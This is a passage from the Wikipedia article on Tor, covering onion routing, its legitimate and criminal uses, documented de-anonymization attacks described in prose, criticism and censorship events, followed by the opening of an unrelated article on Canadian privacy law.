to subvert it.[25][11]Tor was one of a dozen circumvention tools evaluated by aFreedom House-funded report based on user experience from China in 2010, which includeUltrasurf,Hotspot Shield, andFreegate.[26] Tor is not meant to completely solve the issue of anonymity on the web. Tor is not designed to completely erase tracking but instead to reduce the likelihood for sites to trace actions and data back to the user.[27] Tor can also be used for illegal activities. These can include privacy protection or censorship circumvention,[28]as well as distribution of child abuse content, drug sales, or malware distribution.[29] Tor has been described byThe Economist, in relation toBitcoinandSilk Road, as being "a dark corner of the web".[30]It has been targeted by the AmericanNational Security Agencyand the BritishGCHQsignals intelligenceagencies, albeit with marginal success,[25]and more successfully by the BritishNational Crime Agencyin its Operation Notarise.[31]At the same time, GCHQ has been using a tool named "Shadowcat" for "end-to-end encrypted access to VPS over SSH using the Tor network".[32][33]Tor can be used for anonymous defamation, unauthorizednews leaksof sensitive information,copyright infringement, distribution of illegal sexual content,[34][35][36]sellingcontrolled substances,[37]weapons, and stolen credit card numbers,[38]money laundering,[39]bank fraud,[40]credit card fraud,identity theftand the exchange ofcounterfeit currency;[41]theblack marketutilizes the Tor infrastructure, at least in part, in conjunction with Bitcoin.[23]It has also been used to brickIoTdevices.[42] In its complaint againstRoss William UlbrichtofSilk Road, the USFederal Bureau of Investigationacknowledged that Tor has "known legitimate uses".[43][44]According toCNET, Tor's anonymity function is "endorsed by theElectronic Frontier Foundation(EFF) and other civil liberties groups as a method forwhistleblowersand human rights workers to communicate with journalists".[45]EFF's Surveillance Self-Defense guide includes a description of where Tor fits in a larger strategy for protecting privacy and anonymity.[46] In 2014, the EFF'sEva GalperintoldBusinessweekthat "Tor's biggest problem is press. No one hears about that time someone wasn'tstalkedby their abuser. They hear how somebody got away with downloading child porn."[47] The Tor Project states that Tor users include "normal people" who wish to keep their Internet activities private from websites and advertisers, people concerned about cyber-spying, and users who are evading censorship such as activists, journalists, and military professionals. In November 2013, Tor had about four million users.[48]According to theWall Street Journal, in 2012 about 14% of Tor's traffic connected from the United States, with people in "Internet-censoring countries" as its second-largest user base.[49]Tor is increasingly used by victims ofdomestic violenceand thesocial workersand agencies that assist them, even though shelter workers may or may not have had professional training on cyber-security matters.[50]Properly deployed, however, it precludes digital stalking, which has increased due to the prevalence of digital media in contemporaryonlinelife.[51]Along withSecureDrop, Tor is used by news organizations such asThe Guardian,The New Yorker,ProPublicaandThe Interceptto protect the privacy of whistleblowers.[52] In March 2015, theParliamentary Office of Science and Technologyreleased a briefing which stated that "There is widespread agreement that banning online anonymity systems altogether is not seen as an acceptable policy option in the U.K." and that "Even if it were, there would be technical challenges." The report further noted that Tor "plays only a minor role in the online viewing and distribution of indecent images of children" (due in part to its inherent latency); its usage by theInternet Watch Foundation, the utility of its onion services forwhistleblowers, and its circumvention of theGreat Firewallof China were touted.[53] Tor's executive director, Andrew Lewman, also said in August 2014 that agents of the NSA and the GCHQ have anonymously provided Tor with bug reports.[54] The Tor Project's FAQ offers supporting reasons for the EFF's endorsement: Criminals can already do bad things. Since they're willing to break laws, they already have lots of options available that provide better privacy than Tor provides... Tor aims to provide protection for ordinary people who want to follow the law. Only criminals have privacy right now, and we need to fix that... So yes, criminals could in theory use Tor, but they already have better options, and it seems unlikely that taking Tor away from the world will stop them from doing their bad things. At the same time, Tor and other privacy measures can fight identity theft, physical crimes like stalking, and so on. Tor aims to conceal its users' identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation ofonion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe. These onion routers employencryptionin a multi-layered manner (hence the onion metaphor) to ensureperfect forward secrecybetween relays, thereby providing users with anonymity in a network location. That anonymity extends to the hosting of censorship-resistant content by Tor's anonymous onion service feature.[7]Furthermore, by keeping some of the entry relays (bridge relays) secret, users can evadeInternet censorshipthat relies upon blocking public Tor relays.[56] Because theIP addressof the sender and the recipient are notbothincleartextat any hop along the way, anyone eavesdropping at any point along the communication channel cannot directly identify both ends. Furthermore, to the recipient, it appears that the last Tornode(called the exit node), rather than the sender, is the originator of the communication. A Tor user'sSOCKS-aware applications can be configured to direct their network traffic through a Tor instance's SOCKS interface, which is listening on TCP port 9050 (for standalone Tor) or 9150 (for Tor Browser bundle) atlocalhost.[57]Tor periodically creates virtual circuits through the Tor network through which it canmultiplexand onion-route that traffic to its destination. Once inside a Tor network, the traffic is sent from router to router along the circuit, ultimately reaching an exit node at which point thecleartextpacket is available and is forwarded on to its original destination. Viewed from the destination, the traffic appears to originate at the Tor exit node. Tor's application independence sets it apart from most other anonymity networks: it works at theTransmission Control Protocol(TCP) stream level. Applications whose traffic is commonly anonymized using Tor includeInternet Relay Chat(IRC),instant messaging, andWorld Wide Webbrowsing. Tor can also provide anonymity to websites and other servers. Servers configured to receive inbound connections only through Tor are calledonion services(formerly,hidden services).[58]Rather than revealing a server's IP address (and thus its network location), an onion service is accessed through itsonion address, usually via theTor Browseror some other software designed to use Tor. The Tor network understands these addresses by looking up their correspondingpublic keysandintroduction pointsfrom adistributed hash tablewithin the network. It can route data to and from onion services, even those hosted behindfirewallsornetwork address translators(NAT), while preserving the anonymity of both parties. Tor is necessary to access these onion services.[59]Because the connection never leaves the Tor network, and is handled by the Tor application on both ends, the connection is alwaysend-to-end encrypted. Onion services were first specified in 2003[60]and have been deployed on the Tor network since 2004.[61]They are unlisted by design, and can only be discovered on the network if the onion address is already known,[62]though a number of sites and services do catalog publicly known onion addresses. Popular sources of.onionlinks includePastebin,Twitter,Reddit, otherInternet forums, and tailored search engines.[63] While onion services are often discussed in terms of websites, they can be used for anyTCPservice, and are commonly used for increased security or easier routing to non-web services, such assecure shellremote login, chat services such asIRCandXMPP, orfile sharing.[58]They have also become a popular means of establishingpeer-to-peerconnections in messaging[64][65]and file sharing applications.[66]Web-based onion services can be accessed from a standard web browser withoutclient-sideconnection to the Tor network using services likeTor2web, which remove client anonymity.[67] Like all software with anattack surface, Tor's protections have limitations, and Tor's implementation or design have been vulnerable to attacks at various points throughout its history.[68][19]While most of these limitations and attacks are minor, either being fixed without incident or proving inconsequential, others are more notable. Tor is designed to provide relatively high performance network anonymity against an attacker with a single vantage point on the connection (e.g., control over one of the three relays, the destination server, or the user'sinternet service provider). Like all currentlow-latencyanonymity networks, Tor cannot and does not attempt to protect against an attacker performing simultaneous monitoring of traffic at the boundaries of the Tor network—i.e., the traffic entering and exiting the network. While Tor does provide protection againsttraffic analysis, it cannot prevent traffic confirmation via end-to-end correlation.[69][70] There are no documented cases of this limitation being used at scale; as of the 2013Snowden leaks, law enforcement agencies such as theNSAwere unable to performdragnetsurveillance on Tor itself, and relied on attacking other software used in conjunction with Tor, such asvulnerabilitiesinweb browsers.[71]However, targeted attacks have been able to make use of traffic confirmation on individual Tor users, via police surveillance or investigations confirming that a particular person already under suspicion was sending Tor traffic at the exact times the connections in question occurred.[72][73]Therelay early traffic confirmation attackalso relied on traffic confirmation as part of its mechanism, though on requests for onion service descriptors, rather than traffic to the destination server. Like many decentralized systems, Tor relies on aconsensus mechanismto periodically update its current operating parameters. For Tor, these include network parameters like which nodes are good and bad relays, exits, guards, and how much traffic each can handle. Tor's architecture for deciding the consensus relies on a small number of directory authority nodes voting on current network parameters. Currently, there are nine directory authority nodes, and their health is publicly monitored.[74]The IP addresses of the authority nodes arehard codedinto each Tor client. The authority nodes vote every hour to update the consensus, and clients download the most recent consensus on startup.[75][76][77]A compromise of the majority of the directory authorities could alter the consensus in a way that is beneficial to an attacker. Alternatively, a network congestion attack, such as aDDoS, could theoretically prevent the consensus nodes from communicating, and thus prevent voting to update the consensus (though such an attack would be visible).[citation needed] Tor makes no attempt to conceal the IP addresses of exit relays, or hide from a destination server the fact that a user is connecting via Tor.[78]Operators of Internet sites therefore have the ability to prevent traffic from Tor exit nodes or to offer reduced functionality for Tor users. For example,Wikipediagenerally forbids all editing when using Tor or when using an IP address also used by a Tor exit node,[79]and theBBCblocks the IP addresses of all known Tor exit nodes from itsiPlayerservice.[80] Apart from intentional restrictions of Tor traffic, Tor use can trigger defense mechanisms on websites intended to block traffic from IP addresses observed to generate malicious or abnormal traffic.[81][82]Because traffic from all Tor users is shared by a comparatively small number of exit relays, tools can misidentify distinct sessions as originating from the same user, and attribute the actions of a malicious user to a non-malicious user, or observe an unusually large volume of traffic for one IP address. Conversely, a site may observe a single session connecting from different exit relays, with differentInternet geolocations, and assume the connection is malicious, or triggergeo-blocking. When these defense mechanisms are triggered, it can result in the site blocking access, or presentingcaptchasto the user. In July 2014, the Tor Project issued a security advisory for a "relay early traffic confirmation" attack, disclosing the discovery of a group of relays attempting to de-anonymize onion service users and operators.[83]A set of onion service directory nodes (i.e., the Tor relays responsible for providing information about onion services) were found to be modifying traffic of requests. The modifications made it so the requesting client's guard relay, if controlled by the same adversary as the onion service directory node, could easily confirm that the traffic was from the same request. This would allow the adversary to simultaneously know the onion service involved in the request, and the IP address of the client requesting it (where the requesting client could be a visitor or owner of the onion service).[83] The attacking nodes joined the network on 30 January, using aSybil attackto comprise 6.4% of guard relay capacity, and were removed on 4 July.[83]In addition to removing the attacking relays, the Tor application was patched to prevent the specific traffic modifications that made the attack possible. In November 2014, there was speculation in the aftermath ofOperation Onymous, resulting in 17 arrests internationally, that a Tor weakness had been exploited. A representative ofEuropolwas secretive about the method used, saying: "This is something we want to keep for ourselves. The way we do this, we can't share with the whole world, because we want to do it again and again and again."[84]ABBCsource cited a "technical breakthrough"[85]that allowed tracking physical locations of servers, and the initial number of infiltrated sites led to the exploit speculation. A Tor Project representative downplayed this possibility, suggesting that execution of more traditional police work was more likely.[86][87] In November 2015, court documents suggested a connection between the attack and arrests, and raised concerns about security research ethics.[88][89]The documents revealed that theFBIobtained IP addresses of onion services and their visitors from a "university-based research institute", leading to arrests. Reporting fromMotherboardfound that the timing and nature of the relay early traffic confirmation attack matched the description in the court documents. Multiple experts, including a senior researcher with theICSIofUC Berkeley,Edward FeltenofPrinceton University, andthe Tor Projectagreed that theCERT Coordination CenterofCarnegie Mellon Universitywas the institute in question.[88][90][89]Concerns raised included the role of an academic institution in policing, sensitive research involving non-consenting users, the non-targeted nature of the attack, and the lack of disclosure about the incident.[88][90][89] Many attacks targeted at Tor users result from flaws in applications used with Tor, either in the application itself, or in how it operates in combination with Tor. E.g., researchers withInriain 2011 performed an attack onBitTorrentusers by attacking clients that established connections both using and not using Tor, then associating other connections shared by the same Tor circuit.[91] When using Tor, applications may still provide data tied to a device, such as information about screen resolution, installed fonts, language configuration, or supported graphics functionality, reducing the set of users a connection could possibly originate from, or uniquely identifying them.[92]This information is known as thedevice fingerprint, or browser fingerprint in the case of web browsers. Applications implemented with Tor in mind, such as Tor Browser, can be designed to minimize the amount of information leaked by the application and reduce its fingerprint.[92][93] Tor cannot encrypt the traffic between an exit relay and the destination server. If an application does not add an additional layer ofend-to-end encryptionbetween the client and the server, such asTransport Layer Security(TLS, used inHTTPS) or theSecure Shell(SSH) protocol, this allows the exit relay to capture and modify traffic.[94][95]Attacks from malicious exit relays have recorded usernames and passwords,[96]and modifiedBitcoinaddresses to redirect transactions.[97] Some of these attacks involved actively removing the HTTPS protections that would have otherwise been used.[94]To attempt to prevent this, Tor Browser has since made it so only connections via onion services or HTTPS are allowed by default.[98] In 2011, theDutch authorityinvestigatingchild pornographydiscovered the IP address of a Tor onion service site from an unprotected administrator's account and gave it to theFBI, who traced it to Aaron McGrath.[99]After a year of surveillance, the FBI launched "Operation Torpedo" which resulted in McGrath's arrest and allowed them to install theirNetwork Investigative Technique(NIT) malware on the servers for retrieving information from the users of the three onion service sites that McGrath controlled.[100]The technique exploited a vulnerability in Firefox/Tor Browser that had already been patched, and therefore targeted users that had not updated. AFlashapplication sent a user's IP address directly back to an FBI server,[101][102][103][104]and resulted in revealing at least 25 US users as well as numerous users from other countries.[105]McGrath was sentenced to 20 years in prison in early 2014, while at least 18 others (including a former ActingHHSCyber Security Director) were sentenced in subsequent cases.[106][107] In August 2013, it was discovered[108][109]that theFirefoxbrowsers in many older versions of the Tor Browser Bundle were vulnerable to a JavaScript-deployedshellcodeattack, as NoScript was not enabled by default.[110]Attackers used this vulnerability to extract users' MAC and IP addresses and Windows computer names.[111][112][113]News reports linked this to a FBI operation targetingFreedom Hosting's owner, Eric Eoin Marques, who was arrested on a provisionalextraditionwarrant issued by a United States' court on 29 July.[114]The FBI extradited Marques from Ireland to the state of Maryland on 4 charges: distributing; conspiring to distribute; and advertising child pornography, as well as aiding and abetting advertising of child pornography.[115][116][117]The FBI acknowledged the attack in a 12 September 2013 court filing inDublin;[118]further technical details from a training presentation leaked byEdward Snowdenrevealed the code name for the exploit as "EgotisticalGiraffe".[71] In 2022,Kasperskyresearchers found that when looking up "Tor Browser" in Chinese onYouTube, one of theURLsprovided under the top-ranked Chinese-language video actually pointed to malware disguised as Tor Browser. Once installed, it saved browsing history and form data that genuine Tor forgot by default, and downloaded malicious components if the device's IP addresses was in China. Kaspersky researchers noted that the malware was not stealing data to sell for profit, but was designed to identify users.[119] Like client applications that use Tor, servers relying on onion services for protection can introduce their own weaknesses. Servers that are reachable through Tor onion services and the public Internet can be subject to correlation attacks, and all onion services are susceptible to misconfigured services (e.g., identifying information included by default in web server error responses), leaking uptime and downtime statistics, intersection attacks, or various user errors.[120][121]The OnionScan program, written by independent security researcherSarah Jamie Lewis, comprehensively examines onion services for such flaws and vulnerabilities.[122] The main implementation of Tor is written primarily inC.[123]Starting in 2020, the Tor Project began development of a full rewrite of the C Tor codebase inRust.[124]The project, named Arti, was publicly announced in July 2021.[125] The Tor Browser[131]is aweb browsercapable of accessing the Tor network. It was created as the Tor Browser Bundle bySteven J. Murdoch[132]and announced in January 2008.[133]The Tor Browser consists of a modified MozillaFirefoxESR web browser, the TorButton, TorLauncher,NoScriptand the Tor proxy.[134][135]Users can run the Tor Browser fromremovable media. It can operate underMicrosoft Windows,macOS,AndroidandLinux.[136] The defaultsearch engineisDuckDuckGo(until version 4.5,Startpage.comwas its default). The Tor Browser automatically starts Tor background processes and routes traffic through the Tor network. Upon termination of a session the browser deletes privacy-sensitive data such as HTTP cookies and the browsing history.[135]This is effective in reducingweb trackingandcanvas fingerprinting, and it also helps to prevent creation of afilter bubble.[citation needed] To allow download from places where accessing the Tor Project URL may be risky or blocked, aGitHubrepository is maintained with links for releases hosted in other domains.[137] On 29 October 2015, the Tor Project released Tor Messenger Beta, an instant messaging program based onInstantbirdwith Tor andOTRbuilt in and used by default.[138]LikePidginandAdium, Tor Messenger supports multiple different instant messaging protocols; however, it accomplishes this without relying onlibpurple, implementing all chat protocols in the memory-safe language JavaScript instead.[141][142] According to Lucian Armasu of Toms Hardware, in April 2018, the Tor Project shut down the Tor Messenger project for three reasons: the developers of "Instabird" [sic] discontinued support for their own software, limited resources and known metadata problems.[143]The Tor Messenger developers explained that overcoming any vulnerabilities discovered in the future would be impossible due to the project relying on outdated software dependencies.[144] In 2016, Tor developer Mike Perry announced a prototype tor-enabled smartphone based onCopperheadOS.[145][146]It was meant as a direction for Tor on mobile.[147]The project was called 'Mission Improbable'. Copperhead's then lead developer Daniel Micay welcomed the prototype.[148] TheVuze(formerly Azureus)BitTorrentclient,[149]Bitmessageanonymous messaging system,[150]andTorChatinstant messenger include Tor support. TheBriarmessenger routes all messaging via Tor by default.OnionShareallows users to share files using Tor.[66] The Guardian Projectis actively developing a free and open-source suite of applications and firmware for theAndroid operating systemto improve the security of mobile communications.[151]The applications include theChatSecureinstant messaging client,[152]OrbotTor implementation[153](also available for iOS),[154]Orweb (discontinued) privacy-enhanced mobile browser,[155][156]Orfox, the mobile counterpart of the Tor Browser, ProxyMobFirefox add-on,[157]and ObscuraCam.[158] Onion Browser[159]is open-source, privacy-enhancing web browser foriOS, which uses Tor.[160]It is available in the iOSApp Store,[161]and source code is available onGitHub.[162] Braveadded support for Tor in its desktop browser'sprivate-browsingmode.[163][164] In September of 2024, it was announced thatTails, asecurity-focused operating system, had become part of the Tor Project.[165]Other security-focused operating systems that make or made extensive use of Tor includeHardened Linux From Scratch, Incognito,Liberté Linux,Qubes OS,Subgraph,Parrot OS, Tor-ramdisk, andWhonix.[166] Tor has been praised for providing privacy and anonymity to vulnerable Internet users such as political activists fearing surveillance and arrest, ordinary web users seeking to circumvent censorship, and people who have been threatened with violence or abuse by stalkers.[168][169]The U.S. National Security Agency (NSA) has called Tor "the king of high-secure, low-latency Internet anonymity",[25]andBusinessWeekmagazine has described it as "perhaps the most effective means of defeating the online surveillance efforts of intelligence agencies around the world".[11]Other media have described Tor as "a sophisticated privacy tool",[170]"easy to use"[171]and "so secure that even the world's most sophisticated electronic spies haven't figured out how to crack it".[47] Advocates for Tor say it supportsfreedom of expression, including in countries where the Internet is censored, by protecting the privacy and anonymity of users. The mathematical underpinnings of Tor lead it to be characterized as acting "like a piece ofinfrastructure, and governments naturally fall into paying for infrastructure they want to use".[172] The project was originally developed on behalf of the U.S. intelligence community and continues to receive U.S. government funding, and has been criticized as "more resembl[ing] a spook project than a tool designed by a culture that values accountability or transparency".[173]As of 2012[update], 80% of The Tor Project's $2M annual budget came from theUnited States government, with theU.S. State Department, theBroadcasting Board of Governors, and theNational Science Foundationas major contributors,[174]aiming "to aid democracy advocates in authoritarian states".[175]Other public sources of funding includeDARPA, theU.S. Naval Research Laboratory, and theGovernment of Sweden.[176][177]Some have proposed that the government values Tor's commitment to free speech, and uses the darknet to gather intelligence.[178][need quotation to verify]Tor also receives funding fromNGOsincludingHuman Rights Watch, and private sponsors includingRedditandGoogle.[179]Dingledine said that theUnited States Department of Defensefunds are more similar to aresearch grantthan aprocurement contract. Tor executive director Andrew Lewman said that even though it accepts funds from the U.S. federal government, the Tor service did not collaborate with the NSA to reveal identities of users.[180] Critics say that Tor is not as secure as it claims,[181]pointing to U.S. law enforcement's investigations and shutdowns of Tor-using sites such as web-hosting companyFreedom Hostingand online marketplaceSilk Road.[173]In October 2013, after analyzing documents leaked by Edward Snowden,The Guardianreported that the NSA had repeatedly tried to crack Tor and had failed to break its core security, although it had had some success attacking the computers of individual Tor users.[25]The Guardianalso published a 2012 NSA classified slide deck, entitled "Tor Stinks", which said: "We will never be able to de-anonymize all Tor users all the time", but "with manual analysis we can de-anonymize a very small fraction of Tor users".[182]When Tor users are arrested, it is typically due to human error, not to the core technology being hacked or cracked.[183]On 7 November 2014, for example, a joint operation by the FBI, ICE Homeland Security investigations and European Law enforcement agencies led to 17 arrests and the seizure of 27 sites containing 400 pages.[184][dubious–discuss]A late 2014 report byDer Spiegelusing a new cache of Snowden leaks revealed, however, that as of 2012[update]the NSA deemed Tor on its own as a "major threat" to its mission, and when used in conjunction with other privacy tools such asOTR, Cspace,ZRTP,RedPhone,Tails, andTrueCryptwas ranked as "catastrophic," leading to a "near-total loss/lack of insight to target communications, presence..."[185][186] In March 2011, The Tor Project received theFree Software Foundation's 2010 Award for Projects of Social Benefit. The citation read, "Using free software, Tor has enabled roughly 36 million people around the world to experience freedom of access and expression on the Internet while keeping them in control of their privacy and anonymity. Its network has proved pivotal in dissident movements in bothIranand more recentlyEgypt."[187] Iran tried to block Tor at least twice in 2011. One attempt simply blocked all servers with 2-hour-expiry security certificates; it was successful for less than 24 hours.[188][189] In 2012,Foreign Policymagazine named Dingledine, Mathewson, and Syverson among its Top 100 Global Thinkers "for making the web safe for whistleblowers".[190] In 2013,Jacob Appelbaumdescribed Tor as a "part of an ecosystem of software that helps people regain and reclaim their autonomy. It helps to enable people to have agency of all kinds; it helps others to help each other and it helps you to help yourself. It runs, it is open and it is supported by a large community spread across all walks of life."[191] In June 2013, whistleblowerEdward Snowdenused Tor to send information aboutPRISMtoThe Washington PostandThe Guardian.[192] In 2014, the Russian government offered a $111,000 contract to "study the possibility of obtaining technical information about users and users' equipment on the Tor anonymous network".[193][194] In September 2014, in response to reports thatComcasthad been discouraging customers from using the Tor Browser,Comcastissued a public statement that "We have no policy against Tor, or any other browser or software."[195] In October 2014, The Tor Project hired the public relations firm Thomson Communications to improve its public image (particularly regarding the terms "Dark Net" and "hidden services," which are widely viewed as being problematic) and to educate journalists about the technical aspects of Tor.[196] Turkey blockeddownloads of Tor Browser from the Tor Project.[197] In June 2015, thespecial rapporteurfrom the United Nations'Office of the High Commissioner for Human Rightsspecifically mentioned Tor in the context of the debate in the U.S. about allowing so-calledbackdoorsin encryption programs for law enforcement purposes[198]in an interview forThe Washington Post. In July 2015, the Tor Project announced an alliance with theLibrary Freedom Projectto establish exit nodes in public libraries.[199][200]The pilot program, which established a middle relay running on the excess bandwidth afforded by the Kilton Library inLebanon, New Hampshire, making it the first library in the U.S. to host a Tor node, was briefly put on hold when the local city manager and deputy sheriff voiced concerns over the cost of defending search warrants for information passed through the Tor exit node. Although theDepartment of Homeland Security(DHS) had alerted New Hampshire authorities to the fact that Tor is sometimes used by criminals, the Lebanon Deputy Police Chief and the Deputy City Manager averred that no pressure to strong-arm the library was applied, and the service was re-established on 15 September 2015.[201]U.S. Rep.Zoe Lofgren(D-Calif) released a letter on 10 December 2015, in which she asked theDHSto clarify its procedures, stating that "While the Kilton Public Library's board ultimately voted to restore their Tor relay, I am no less disturbed by the possibility thatDHSemployees are pressuring or persuading public and private entities to discontinue or degrade services that protect the privacy and anonymity of U.S. citizens."[202][203][204]In a 2016 interview, Kilton Library IT Manager Chuck McAndrew stressed the importance of getting libraries involved with Tor: "Librarians have always cared deeply about protecting privacy, intellectual freedom, andaccess to information(the freedom to read). Surveillance has a very well-documented chilling effect on intellectual freedom. It is the job of librarians to remove barriers to information."[205]The second library to host a Tor node was the Las Naves Public Library inValencia, Spain, implemented in the first months of 2016.[206] In August 2015, anIBMsecurity research group, called "X-Force", put out a quarterly report that advised companies to block Tor on security grounds, citing a "steady increase" in attacks from Tor exit nodes as well as botnet traffic.[207] In September 2015, Luke Millanta created OnionView (now defunct), a web service that plots the location of active Tor relay nodes onto an interactive map of the world. The project's purpose was to detail the network's size and escalating growth rate.[208] In December 2015,Daniel Ellsberg(of thePentagon Papers),[209]Cory Doctorow(ofBoing Boing),[210]Edward Snowden,[211]and artist-activistMolly Crabapple,[212]amongst others, announced their support of Tor. In March 2016, New Hampshire state representativeKeith Ammonintroduced a bill[213]allowing public libraries to run privacy software. The bill specifically referenced Tor. The text was crafted with extensive input fromAlison Macrina, the director of theLibrary Freedom Project.[214]The bill was passed by the House 268–62.[215] Also in March 2016, the first Tor node, specifically a middle relay, was established at a library in Canada, the Graduate Resource Centre (GRC) in the Faculty of Information and Media Studies (FIMS) at theUniversity of Western Ontario.[216]Given that the running of a Tor exit node is an unsettled area of Canadian law,[217]and that in general institutions are more capable than individuals to cope with legal pressures, Alison Macrina of the Library Freedom Project has opined that in some ways she would like to see intelligence agencies and law enforcement attempt to intervene in the event that an exit node were established.[218] On 16 May 2016,CNNreported on the case of core Tor developer "isis agora lovecruft",[219]who had fled to Germany under the threat of a subpoena by the FBI during the Thanksgiving break of the previous year. TheElectronic Frontier Foundationlegally represented lovecruft.[220] On 2 December 2016,The New Yorkerreported on burgeoningdigital privacyand security workshops in theSan Francisco Bay Area, particularly at thehackerspaceNoisebridge, in the wake of the2016 United States presidential election; downloading the Tor browser was mentioned.[221]Also, in December 2016, Turkey has blocked the usage of Tor, together with ten of the most usedVPNservices in Turkey, which were popular ways of accessing banned social media sites and services.[222] Tor (andBitcoin) was fundamental to the operation of the dark web marketplaceAlphaBay, which was taken down in an international law enforcement operation in July 2017.[223]Despite federal claims that Tor would not shield a user, however,[224]elementaryoperational securityerrors outside of the ambit of the Tor network led to the site's downfall.[225] In June 2017 theDemocratic Socialists of Americarecommended intermittent Tor usage for politically active organizations and individuals as a defensive mitigation againstinformation securitythreats.[226][227]And in August 2017, according to reportage, cybersecurity firms which specialize in monitoring and researching the dark web (which relies on Tor as its infrastructure) on behalf of banks and retailers routinely share their findings with theFBIand with other law enforcement agencies "when possible and necessary" regarding illegal content. The Russian-speaking underground offering a crime-as-a-service model is regarded as being particularly robust.[228] In June 2018, Venezuela blocked access to the Tor network. The block affected both direct connections to the network and connections being made via bridge relays.[229] On 20 June 2018, Bavarian police raided the homes of the board members of the non-profitZwiebelfreunde, a member oftorservers.net, which handles the European financial transactions ofriseup.netin connection with a blog post there which apparently promised violence against the upcomingAlternative for Germanyconvention.[230][231]Tor came out strongly against the raid on its support organization, which provides legal and financial aid for the setting up and maintenance of high-speed relays and exit nodes.[232]According to torservers.net, on 23 August 2018 the German court at Landgericht München ruled that the raid and seizures were illegal. The hardware and documentation seized had been kept under seal, and purportedly were neither analyzed nor evaluated by the Bavarian police.[233][234] Since October 2018,Chinese online communitieswithin Tor have begun to dwindle due to increased efforts to stop them by the Chinese government.[235] In November 2019,Edward Snowdencalled for a full, unabridgedsimplified Chinesetranslation of his autobiography,Permanent Record, as the Chinese publisher had violated their agreement by expurgating all mentions of Tor and other matters deemed politically sensitive by theChinese Communist Party.[236][237] On 8 December 2021, the Russian government agencyRoskomnadzorannounced it has banned Tor and six VPN services for failing to abide by theRussian Internet blacklist.[238]Russian ISPs unsuccessfully attempted to block Tor's main website as well as several bridges beginning on 1 December 2021.[239]The Tor Project has appealed to Russian courts over this ban.[240] In response toInternet censorshipduring theRussian invasion of Ukraine, theBBCandVOAhave directed Russian audiences to Tor.[241]The Russian government increased efforts to block access to Tor through technical and political means, while the network reported an increase in traffic from Russia, and increased Russian use of its anti-censorshipSnowflake tool.[242] Russian courts temporarily lifted the blockade on Tor's website (but not connections to relays) on May 24, 2022[243]due to Russian law requiring that the Tor Project be involved in the case. However, the blockade was reinstated on July 21, 2022.[244] Iran implemented rolling internet blackouts during theMahsa Amini protests, and Tor andSnowflakewere used to circumvent them.[245][246][247][248] China, with its highly centralized control of its internet, had effectively blocked Tor.[242] Tor responded to earlier vulnerabilities listed above by patching them and improving security. In one way or another, human (user) errors can lead to detection. The Tor Project website provides the best practices (instructions) on how to properly use the Tor browser. When improperly used, Tor is not secure. For example, Tor warns its users that not all traffic is protected; only the traffic routed through the Tor browser is protected. Users are also warned to useHTTPSversions of websites, not totorrentwith Tor, not to enable browser plugins, not to open documents downloaded through Tor while online, and to use safe bridges.[249]Users are also warned that they cannot provide their name or other revealing information in web forums over Tor and stay anonymous at the same time.[250] Despite intelligence agencies' claims that 80% of Tor users would be de-anonymized within 6 months in the year 2013,[251]that has still not happened. In fact, as late as September 2016, the FBI could not locate, de-anonymize and identify the Tor user who hacked into the email account of a staffer onHillary Clinton's email server.[252] The best tactic of law enforcement agencies to de-anonymize users appears to remain with Tor-relay adversaries running poisoned nodes, as well as counting on the users themselves using the Tor browser improperly. For example, downloading a video through the Tor browser and then opening the same file on an unprotected hard drive while online can make the users' real IP addresses available to authorities.[253] When properly used, odds of being de-anonymized through Tor are said to be extremely low. Tor project's co-founderNick Mathewsonexplained that the problem of "Tor-relay adversaries" running poisoned nodes means that a theoretical adversary of this kind is not the network's greatest threat: "No adversary is truly global, but no adversary needs to be truly global," he says. "Eavesdropping on the entire Internet is a several-billion-dollar problem. Running a few computers to eavesdrop on a lot of traffic, a selective denial of service attack to drive traffic to your computers, that's like a tens-of-thousands-of-dollars problem." At the most basic level, an attacker who runs two poisoned Tor nodes—one entry, one exit—is able to analyse traffic and thereby identify the tiny, unlucky percentage of users whose circuit happened to cross both of those nodes. In 2016 the Tor network offers a total of around 7,000 relays, around 2,000 guard (entry) nodes and around 1,000 exit nodes. So the odds of such an event happening are one in two million (1⁄2000×1⁄1000), give or take."[251] Tor does not provide protection againstend-to-end timing attacks: if an attacker can watch the traffic coming out of the target computer, and also the traffic arriving at the target's chosen destination (e.g. a server hosting a .onion site), that attacker can use statistical analysis to discover that they are part of the same circuit.[250] A similar attack has been used by German authorities to track down users related toBoystown.[254] Depending on individual user needs, Tor browser offers three levels of security located under the Security Level (the small gray shield at the top-right of the screen) icon > Advanced Security Settings. In addition to encrypting the data, including constantly changing an IP address through a virtual circuit comprising successive, randomly selected Tor relays, several other layers of security are at a user's disposal:[255][256] At this level, all features from the Tor Browser and other websites are enabled. This level eliminates website features that are often pernicious to the user. This may cause some sites to lose functionality. JavaScript is disabled on all non-HTTPS sites; some fonts and mathematical symbols are disabled. Also, audio and video (HTML5 media) are click-to-play. This level only allows website features required for static sites and basic services. These changes affect images, media, and scripts. Javascript is disabled by default on all sites; some fonts, icons, math symbols, and images are disabled; audio and video (HTML5 media) are click-to-play. In 2023, Tor unveiled a new defense mechanism to safeguard its onion services against denial of service (DoS) attacks. With the release of Tor 0.4.8, this proof-of-work (PoW) defense promises to prioritize legitimate network traffic while deterring malicious attacks.[257]
https://en.wikipedia.org/wiki/Tor_(network)
Canadian privacy lawis derived from thecommon law, statutes of theParliament of Canadaand the various provincial legislatures, and theCanadian Charter of Rights and Freedoms. Perhaps ironically, Canada's legal conceptualization of privacy, along with most modern legal Western conceptions of privacy, can be traced back to Warren and Brandeis’s"The Right to Privacy"published in theHarvard Law Reviewin 1890,[1]Holvast states "Almost all authors on privacy start the discussion with the famous article 'The Right to Privacy' of Samuel Warren and Louis Brandeis".[1] Canadianprivacy lawhas evolved over time into what it is today. The first instance of a formal law came when, in 1977, the Canadian government introduced data protection provisions into theCanadian Human Rights Act.[2]In 1982, theCanadian Charter of Rights and Freedomsoutlined that everyone has "the right to life, liberty and security of the person" and "the right to be free from unreasonable search or seizure",[3]but did not directly mention the concept ofprivacy. In 1983, the federalPrivacy Actregulated how federal government collects, uses and discloses personal information. Canadians' constitutional right to privacy was further confirmed in the 1984 Supreme Court case,Hunter v. Southam.[4]In this case, Section 8 of theCanadian Charter of Rights and Freedoms(1982) was found "to protect individuals from unjustified state intrusions upon their privacy" and the court stated suchCharterrights should be interpreted broadly.[5]Later, in a 1988 Supreme Court case, the right to privacy was established as "an essential component of individual freedom".[4]The court report fromR. v. Dymentstates, "From the earliest stage ofCharterinterpretation, this Court 